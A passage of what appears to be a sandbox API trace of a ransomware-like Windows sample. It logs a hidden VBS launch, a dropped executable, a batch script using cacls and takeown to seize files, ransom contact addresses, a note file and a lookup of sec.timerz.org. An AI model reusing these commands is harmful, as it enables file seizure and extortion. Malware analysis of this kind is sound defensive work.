"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mbmahmxw.vbs")) returned 0x2020 [0060.129] GetCurrentThreadId () returned 0xa68 [0060.129] GetCurrentThreadId () returned 0xa68 [0060.129] GetCurrentThreadId () returned 0xa68 [0060.129] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1f5cf24, csidl=37, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0060.129] CharUpperBuffW (in: lpsz="/C wscript //B //Nologo \"[DSP]\"", cchLength=0x1f | out: lpsz="/C WSCRIPT //B //NOLOGO \"[DSP]\"") returned 0x1f [0060.129] CharUpperBuffW (in: lpsz="[DSP]", cchLength=0x5 | out: lpsz="[DSP]") returned 0x5 [0060.129] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C wscript //B //Nologo \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mBMahmXw.vbs\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18fb14*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18fb04 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C wscript //B //Nologo \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mBMahmXw.vbs\"", lpProcessInformation=0x18fb04*(hProcess=0x19c, hThread=0x1a4, dwProcessId=0x81c, dwThreadId=0x82c)) returned 1 [0060.138] CloseHandle (hObject=0x19c) returned 1 [0060.138] CloseHandle (hObject=0x1a4) returned 1 [0060.138] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f9c0, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dlnxsw.exe")) returned 0x30 [0060.138] GetTickCount () returned 0x114894c [0060.138] QueryPerformanceCounter (in: lpPerformanceCount=0x18fb00 | out: lpPerformanceCount=0x18fb00*=18047723801) returned 1 [0060.138] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fadc, cbMultiByte=1, lpWideCharStr=0x18eac4, cchWideChar=2047 | out: lpWideCharStr="t\x18﫼\x18ﬠ\x18\x01") returned 1 [0060.139] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fadc, cbMultiByte=1, lpWideCharStr=0x18eac4, cchWideChar=2047 | out: lpWideCharStr="d\x18﫼\x18ﬠ\x18\x01") returned 1 [0060.139] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fadc, cbMultiByte=1, lpWideCharStr=0x18eac4, cchWideChar=2047 | out: lpWideCharStr="q\x18﫼\x18ﬠ\x18\x01") returned 1 [0060.139] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fadc, cbMultiByte=1, lpWideCharStr=0x18eac4, cchWideChar=2047 | out: lpWideCharStr="9\x18﫼\x18ﬠ\x18\x01") returned 1 [0060.139] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fadc, cbMultiByte=1, lpWideCharStr=0x18eac4, cchWideChar=2047 | out: lpWideCharStr="6\x18﫼\x18ﬠ\x18\x01") returned 1 [0060.139] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fadc, cbMultiByte=1, lpWideCharStr=0x18eac4, cchWideChar=2047 | out: lpWideCharStr="3\x18﫼\x18ﬠ\x18\x01") returned 1 [0060.139] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fadc, cbMultiByte=1, lpWideCharStr=0x18eac4, cchWideChar=2047 | out: lpWideCharStr="i\x18﫼\x18ﬠ\x18\x01") returned 1 [0060.139] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fadc, cbMultiByte=1, lpWideCharStr=0x18eac4, cchWideChar=2047 | out: lpWideCharStr="i\x18﫼\x18ﬠ\x18\x01") returned 1 [0060.139] FindResourceW (hModule=0x400000, lpName="HN", lpType=0xa) returned 0x4f5440 [0060.139] LoadResource (hModule=0x400000, hResInfo=0x4f5440) returned 0x4f8ed0 [0060.139] SizeofResource (hModule=0x400000, hResInfo=0x4f5440) returned 0x2d488 [0060.139] LockResource (hResData=0x4f8ed0) returned 0x4f8ed0 [0060.140] FreeResource (hResData=0x4f8ed0) returned 0 [0060.140] FindResourceW (hModule=0x400000, lpName="KN", lpType=0xa) returned 0x4f5450 [0060.140] LoadResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x526358 [0060.140] SizeofResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x26 [0060.140] LockResource (hResData=0x526358) returned 0x526358 [0060.140] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fa53c0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0060.141] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fa53c0, cbMultiByte=38, lpWideCharStr=0x1f9e6ec, cchWideChar=38 | out: lpWideCharStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr\r\n42\r\n") returned 38 [0060.141] FreeResource (hResData=0x526358) returned 0 [0060.141] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0060.141] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr", cchWideChar=32, lpMultiByteStr=0x1fa53c4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr", lpUsedDefaultChar=0x0) returned 32 [0060.141] GetCurrentThreadId () returned 0xa68 [0060.141] GetCurrentThreadId () returned 0xa68 [0060.141] GetCurrentThreadId () returned 0xa68 [0060.150] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0060.151] WriteFile (in: hFile=0x1a4, lpBuffer=0x2853f00*, nNumberOfBytesToWrite=0x2d488, lpNumberOfBytesWritten=0x18faec, lpOverlapped=0x0 | out: lpBuffer=0x2853f00*, lpNumberOfBytesWritten=0x18faec*=0x2d488, lpOverlapped=0x0) returned 1 [0060.155] CloseHandle (hObject=0x1a4) returned 1 [0060.160] GetTickCount () returned 0x114895c [0060.160] QueryPerformanceCounter (in: lpPerformanceCount=0x18fb00 | out: lpPerformanceCount=0x18fb00*=18049921069) returned 1 [0060.160] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fadc, cbMultiByte=1, lpWideCharStr=0x18eac4, cchWideChar=2047 | out: lpWideCharStr="C\x18﫼\x18ﬠ\x18\x01") returned 1 [0060.160] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fadc, cbMultiByte=1, lpWideCharStr=0x18eac4, cchWideChar=2047 | out: lpWideCharStr="h\x18﫼\x18ﬠ\x18\x01") returned 1 [0060.160] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fadc, cbMultiByte=1, lpWideCharStr=0x18eac4, cchWideChar=2047 | out: lpWideCharStr="8\x18﫼\x18ﬠ\x18\x01") returned 1 [0060.161] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fadc, cbMultiByte=1, lpWideCharStr=0x18eac4, cchWideChar=2047 | out: lpWideCharStr="1\x18﫼\x18ﬠ\x18\x01") returned 1 [0060.161] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fadc, cbMultiByte=1, lpWideCharStr=0x18eac4, cchWideChar=2047 | out: lpWideCharStr="A\x18﫼\x18ﬠ\x18\x01") returned 1 [0060.161] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fadc, cbMultiByte=1, lpWideCharStr=0x18eac4, cchWideChar=2047 | out: lpWideCharStr="N\x18﫼\x18ﬠ\x18\x01") returned 1 [0060.161] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fadc, cbMultiByte=1, lpWideCharStr=0x18eac4, cchWideChar=2047 | out: lpWideCharStr="B\x18﫼\x18ﬠ\x18\x01") returned 1 [0060.161] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fadc, cbMultiByte=1, lpWideCharStr=0x18eac4, cchWideChar=2047 | out: lpWideCharStr="E\x18﫼\x18ﬠ\x18\x01") returned 1 [0060.161] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpWideCharStr=0x18ea60, cchWideChar=2047 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C簁@﫼\x18絮@﫼\x18\x01") returned 30 [0060.161] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpWideCharStr=0x18ea60, cchWideChar=2047 | out: lpWideCharStr="takeown /F %1G %USERNAME%:F /C簁@﫼\x18絮@﫼\x18\x01") returned 13 [0060.161] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1f7352c, cbMultiByte=14, lpWideCharStr=0x18ea60, cchWideChar=2047 | out: lpWideCharStr="set FN=\"%~nx1\" %USERNAME%:F /C簁@﫼\x18絮@﫼\x18\x01") returned 14 [0060.161] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpWideCharStr=0x18ea60, cchWideChar=2047 | out: lpWideCharStr="cd /d \"%~dp0\"\" %USERNAME%:F /C簁@﫼\x18絮@﫼\x18\x01") returned 13 [0060.161] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x26739cc, cbMultiByte=130, lpWideCharStr=0x18ea60, cchWideChar=2047 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`[HN] -accepteula %FN% -nobanner`) DO ([HN] -accepteula -c %%J -y -p %%I -nobanner)G_SZ /d \"[WP]\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v TileWallpaper /t REG_SZ /d \"0\" /fE") returned 130 [0060.161] CharUpperBuffW (in: lpsz="cacls %1 /E /G %USERNAME%:F /C\r\ntakeown /F %1\r\nset FN=\"%~nx1\"\r\ncd /d \"%~dp0\"\r\nFOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`[HN] -accepteula %FN% -nobanner`) DO ([HN] -accepteula -c %%J -y -p %%I -nobanner)\r\n", cchLength=0xd2 | out: lpsz="CACLS %1 /E /G %USERNAME%:F /C\r\nTAKEOWN /F %1\r\nSET FN=\"%~NX1\"\r\nCD /D \"%~DP0\"\r\nFOR /F \"USEBACKQ TOKENS=3,6 DELIMS=: \" %%I IN (`[HN] -ACCEPTEULA %FN% -NOBANNER`) DO ([HN] -ACCEPTEULA -C %%J -Y -P %%I -NOBANNER)\r\n") returned 0xd2 [0060.161] CharUpperBuffW (in: lpsz="[HN]", cchLength=0x4 | out: lpsz="[HN]") returned 0x4 [0060.161] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0060.162] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\ntakeown /F %1\r\nset FN=\"%~nx1\"\r\ncd /d \"%~dp0\"\r\nFOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`tdq963ii.exe -accepteula %FN% -nobanner`) DO (tdq963ii.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n", cchWideChar=226, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 226 [0060.162] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\ntakeown /F %1\r\nset FN=\"%~nx1\"\r\ncd /d \"%~dp0\"\r\nFOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`tdq963ii.exe -accepteula %FN% -nobanner`) DO (tdq963ii.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n", cchWideChar=226, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 226 [0060.162] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\ntakeown /F %1\r\nset FN=\"%~nx1\"\r\ncd /d \"%~dp0\"\r\nFOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`tdq963ii.exe -accepteula %FN% -nobanner`) DO (tdq963ii.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n", cchWideChar=226, lpMultiByteStr=0x1ee8758, cbMultiByte=226, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cacls %1 /E /G %USERNAME%:F /C\r\ntakeown /F %1\r\nset FN=\"%~nx1\"\r\ncd /d \"%~dp0\"\r\nFOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`tdq963ii.exe -accepteula %FN% -nobanner`) DO (tdq963ii.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n", lpUsedDefaultChar=0x0) returned 226 [0060.162] WriteFile (in: hFile=0x1a4, lpBuffer=0x1ee8758*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x18fa9c, lpOverlapped=0x0 | out: lpBuffer=0x1ee8758*, lpNumberOfBytesWritten=0x18fa9c*=0xe2, lpOverlapped=0x0) returned 1 [0060.164] CloseHandle (hObject=0x1a4) returned 1 [0060.164] GetCurrentThreadId () returned 0xa68 [0060.165] GetCurrentThreadId () returned 0xa68 [0060.165] GetCurrentThreadId () returned 0xa68 [0060.165] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x20 [0060.165] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat")) returned 0x20 [0060.165] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f9c0, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dlnxsw.exe")) returned 0x30 [0060.165] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x407a44, lpParameter=0x1f80df0, dwCreationFlags=0x4, lpThreadId=0x1efec44 | out: lpThreadId=0x1efec44*=0x83c) returned 0x1a4 [0060.228] SetThreadPriority (hThread=0x1a4, nPriority=0) returned 1 [0060.228] ResumeThread (hThread=0x1a4) returned 0x1 [0060.228] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f71c, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dlnxsw.exe")) returned 0x30 [0060.228] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.tts", lpFindFileData=0x18f974 | out: lpFindFileData=0x18f974*(dwFileAttributes=0x83c, ftCreationTime.dwLowDateTime=0x2, ftCreationTime.dwHighDateTime=0x407a44, ftLastAccessTime.dwLowDateTime=0x7efa9000, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x68cde0, nFileSizeHigh=0x1a4, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x24, cFileName="\x03\x01\x08", cAlternateFileName="NNNNNNNNNǹ")) returned 0xffffffff [0060.228] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0060.228] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1f7a924, cbMultiByte=1, lpWideCharStr=0x18eafc, cchWideChar=2047 | out: lpWideCharStr="8`ﲔ\x18DO ([HN] -accepteula -c %%J -y -p %%I -nobanner)G_SZ /d \"[WP]\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v TileWallpaper /t REG_SZ /d \"0\" /fE") returned 1 [0060.229] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x407a44, lpParameter=0x1f80e00, dwCreationFlags=0x4, lpThreadId=0x26cb654 | out: lpThreadId=0x26cb654*=0x86c) returned 0x1a8 [0060.229] SetThreadPriority (hThread=0x1a8, nPriority=0) returned 1 [0060.229] ResumeThread (hThread=0x1a8) returned 0x1 [0060.229] Sleep (dwMilliseconds=0x19) [0060.281] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x407a44, lpParameter=0x1f80e00, dwCreationFlags=0x4, lpThreadId=0x26cbcc4 | out: lpThreadId=0x26cbcc4*=0x87c) returned 0x1b0 [0060.282] SetThreadPriority (hThread=0x1b0, nPriority=0) returned 1 [0060.282] ResumeThread (hThread=0x1b0) returned 0x1 [0060.282] Sleep (dwMilliseconds=0x19) [0060.354] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x407a44, lpParameter=0x1f80e00, dwCreationFlags=0x4, lpThreadId=0x26cc334 | out: lpThreadId=0x26cc334*=0x8bc) returned 0x1b4 [0060.355] SetThreadPriority (hThread=0x1b4, nPriority=0) returned 1 [0060.355] ResumeThread (hThread=0x1b4) returned 0x1 [0060.355] Sleep (dwMilliseconds=0x19) [0060.636] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x407a44, lpParameter=0x1f80e00, dwCreationFlags=0x4, lpThreadId=0x26cc9a4 | out: lpThreadId=0x26cc9a4*=0x8ec) returned 0x1c0 [0060.637] SetThreadPriority (hThread=0x1c0, nPriority=0) returned 1 [0060.637] ResumeThread (hThread=0x1c0) returned 0x1 [0060.637] Sleep (dwMilliseconds=0x19) [0060.872] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x407a44, lpParameter=0x1f80e00, dwCreationFlags=0x4, lpThreadId=0x26cd014 | out: lpThreadId=0x26cd014*=0x8fc) returned 0x1c8 [0060.873] SetThreadPriority (hThread=0x1c8, nPriority=0) returned 1 [0060.873] ResumeThread (hThread=0x1c8) returned 0x1 [0060.873] Sleep (dwMilliseconds=0x19) [0061.279] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x407a44, lpParameter=0x1f80e00, dwCreationFlags=0x4, lpThreadId=0x26cd684 | out: lpThreadId=0x26cd684*=0x94c) returned 0x1d0 [0061.318] SetThreadPriority (hThread=0x1d0, nPriority=0) returned 1 [0061.318] ResumeThread (hThread=0x1d0) returned 0x1 [0061.318] Sleep (dwMilliseconds=0x19) [0062.016] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x407a44, lpParameter=0x1f80e00, dwCreationFlags=0x4, lpThreadId=0x26cdcf4 | out: lpThreadId=0x26cdcf4*=0x95c) returned 0x1c4 [0062.060] SetThreadPriority (hThread=0x1c4, nPriority=0) returned 1 [0062.061] ResumeThread (hThread=0x1c4) returned 0x1 [0062.061] Sleep (dwMilliseconds=0x19) [0062.398] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x407a44, lpParameter=0x1f80e00, dwCreationFlags=0x4, lpThreadId=0x26ce364 | out: lpThreadId=0x26ce364*=0x96c) returned 0x1ac [0062.399] SetThreadPriority (hThread=0x1ac, nPriority=0) returned 1 [0062.399] ResumeThread (hThread=0x1ac) returned 0x1 [0062.399] Sleep (dwMilliseconds=0x19) [0062.635] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x407a44, lpParameter=0x1f80e00, dwCreationFlags=0x4, lpThreadId=0x26ce9d4 | out: lpThreadId=0x26ce9d4*=0x97c) returned 0x1e0 [0062.636] SetThreadPriority (hThread=0x1e0, nPriority=0) returned 1 [0062.636] ResumeThread (hThread=0x1e0) returned 0x1 [0062.636] Sleep (dwMilliseconds=0x19) [0062.836] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1f88ba4, cbMultiByte=23, lpWideCharStr=0x18eaec, cchWideChar=2047 | out: lpWideCharStr="BobGreen85@criptext.comccepteula -c %%J -y -p %%I -nobanner)G_SZ /d \"[WP]\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v Til矆ெ矍\x18Ƥg") returned 23 [0062.836] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1f7aaec, cbMultiByte=4, lpWideCharStr=0x18eae8, cchWideChar=2047 | out: lpWideCharStr="BG85bGreen85@criptext.comccepteula -c %%J -y -p %%I -nobanner)G_SZ /d \"[WP]\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v Til矆ெ矍\x18Ƥg") returned 4 [0062.836] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x407a44, lpParameter=0x1f80e00, dwCreationFlags=0x4, lpThreadId=0x1f56fc4 | out: lpThreadId=0x1f56fc4*=0x9ac) returned 0x1f4 [0062.836] SetThreadPriority (hThread=0x1f4, nPriority=0) returned 1 [0062.836] ResumeThread (hThread=0x1f4) returned 0x1 [0062.836] Sleep (dwMilliseconds=0x19) [0064.118] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1f88d34, cbMultiByte=23, lpWideCharStr=0x18eafc, cchWideChar=2047 | out: lpWideCharStr="BobGreen85@criptext.coma -c %%J -y -p %%I -nobanner)G_SZ /d \"[WP]\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v Til矆ெ矍\x18Ƥg") returned 23 [0064.118] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1f88d34, cbMultiByte=18, lpWideCharStr=0x18eaf8, cchWideChar=2047 | out: lpWideCharStr="BobGreen85@aol.comext.coma -c %%J -y -p %%I -nobanner)G_SZ /d \"[WP]\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v Til矆ெ矍\x18Ƥg") returned 18 [0064.118] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1f88d34, cbMultiByte=23, lpWideCharStr=0x18eaf4, cchWideChar=2047 | out: lpWideCharStr="BobGreen85@tutanota.com.coma -c %%J -y -p %%I -nobanner)G_SZ /d \"[WP]\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v Til矆ெ矍\x18Ƥg") returned 23 [0064.118] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1f7ab1c, cbMultiByte=5, lpWideCharStr=0x18eaf0, cchWideChar=2047 | out: lpWideCharStr="emptyGreen85@tutanota.com.coma -c %%J -y -p %%I -nobanner)G_SZ /d \"[WP]\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v Til矆ெ矍\x18Ƥg") returned 5 [0064.118] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpWideCharStr=0x18ead0, cchWideChar=2047 | out: lpWideCharStr="BG85_INFO.rtf\x18ﭬ\x18emptyGreen85@tutanota.com.coma -c %%J -y -p %%I -nobanner)G_SZ /d \"[WP]\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v Til矆ெ矍\x18Ƥg") returned 13 [0064.118] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x407a44, lpParameter=0x1f80e00, dwCreationFlags=0x4, lpThreadId=0x26dad34 | out: lpThreadId=0x26dad34*=0xa54) returned 0x200 [0064.119] SetThreadPriority (hThread=0x200, nPriority=0) returned 1 [0064.119] ResumeThread (hThread=0x200) returned 0x1 [0064.119] Sleep (dwMilliseconds=0x19) [0064.467] WaitForMultipleObjects (nCount=0xb, lpHandles=0x4ee250*=0x1a8, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 2 os_tid = 0x9d4 [0050.709] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sec.timerz.org", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0050.709] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sec.timerz.org", cchWideChar=14, lpMultiByteStr=0x1f72c4c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sec.timerz.org", lpUsedDefaultChar=0x0) returned 14 [0050.709] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x1fc1c8c, cbMultiByte=20, lpWideCharStr=0x63ed38, cchWideChar=2047 | out: lpWideCharStr="Host: sec.timerz.org") returned 20 [0051.343] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0051.343] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x1f7a03c, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="80", lpUsedDefaultChar=0x0) returned 2 [0051.343] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sec.timerz.org", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0051.343] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sec.timerz.org", cchWideChar=14, lpMultiByteStr=0x1f72d0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sec.timerz.org", lpUsedDefaultChar=0x0) returned 14 [0051.343] getaddrinfo (pNodeName="sec.timerz.org", pServiceName="80", pHints=0x63fb8c*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x63fbac) Thread: id = 5 os_tid = 0x60c Thread: id = 7 os_tid = 0x324 [0058.145] WideCharToMultiByte (in: 